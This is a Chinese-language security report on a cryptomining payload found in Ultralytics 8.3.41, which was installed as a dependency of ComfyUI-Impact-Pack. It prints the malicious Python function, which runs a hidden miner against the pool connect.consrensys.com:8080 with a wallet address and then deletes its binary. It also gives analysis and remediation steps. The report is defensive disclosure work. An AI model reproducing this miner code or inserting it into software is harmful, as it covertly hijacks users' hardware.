潛在加密貨幣挖礦攻擊報告:ComfyUI 與 Ultralytics 的安全問題
概要描述
近期在使用 ComfyUI 搭配 ComfyUI-Impact-Pack 擴展時,發現疑似未經授權的加密貨幣挖礦行為。問題來源為 Ultralytics 套件中的一段惡意 Python 程式碼,該程式碼試圖使用系統資源進行未經許可的挖礦操作。
問題描述
這次事件涉及到安裝於以下路徑中的下載模組 (downloads.py):
你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils
惡意程式碼片段
以下是檢測到的惡意程式碼:
def safe_run(path):
os.chmod(path, 0o770)
command = [
path,
'-u',
'4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
'-o',
'connect.consrensys.com:8080',
'-k'
]
process = subprocess.Popen(
command,
stdin=subprocess.DEVNULL,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
preexec_fn=os.setsid,
close_fds=True
)
os.remove(path)
行為分析
- 權限變更:使用
os.chmod令檔案可執行。 - 執行惡意命令:連接至礦池伺服器
connect.consrensys.com:8080。 - 隱藏過程:壓制標準輸入、輸出和錯誤流,避免被察覺。
- 刪除檔案:執行後刪除檔案以掩蓋證據。
風險評估
潛在影響
- 高系統資源占用:挖礦行為會顯著增加 CPU/GPU 的使用率。
- 硬體損耗:長期高負載可能縮短硬體壽命。
- 安全隱患:可能危及系統的敏感資料或整體安全性。
問題來源
該惡意行為與 Ultralytics 套件的可疑版本有關,該版本似乎作為 ComfyUI-Impact-Pack 的自動依賴項被安裝。
安裝路徑
- 可疑套件:Ultralytics 版本 8.3.41
- 位置:
你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics
啟動源
可能由 ComfyUI-Impact-Pack 中的 install.py 腳本觸發,該腳本會自動安裝依賴項。
網路行為分析
目標網域
- 網域名稱:
connect.consrensys.com - 通訊埠:8080
- 用途:懷疑為礦池伺服器的終端點,可能使用 Stratum 協議進行挖礦。
證據
- 腳本中明確指定的礦池連接細節。
- 使用私密金鑰(如
4BHRQHF...)表明有活躍的挖礦帳戶或操作。
推薦處置措施
卸載可疑套件
pip uninstall ultralytics ultralytics-thop移除 ComfyUI-Impact-Pack 刪除相關目錄:
./ComfyUI/custom_nodes/ComfyUI-Impact-Pack掃描系統 使用防毒軟體和惡意程式檢測工具,確保沒有持續的威脅。
檢查網路連接 確認是否有到
connect.consrensys.com的外部連接,並在防火牆中封鎖。提高意識 將該報告提交給 ComfyUI 和 Ultralytics 的維護者,以防止進一步濫用。
附加證據
相關細節
- 程式碼位置:
你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py - 行為模式:未經授權的檔案執行、礦池連接、及證據清理。
- 觸發條件:ComfyUI-Impact-Pack 自動安裝依賴項。
資料來源
結論
此次事件表明開源專案中的依賴項審查不足可能導致使用者系統遭到惡意攻擊。建議開源社群實施更嚴格的審核機制以保護最終用戶。
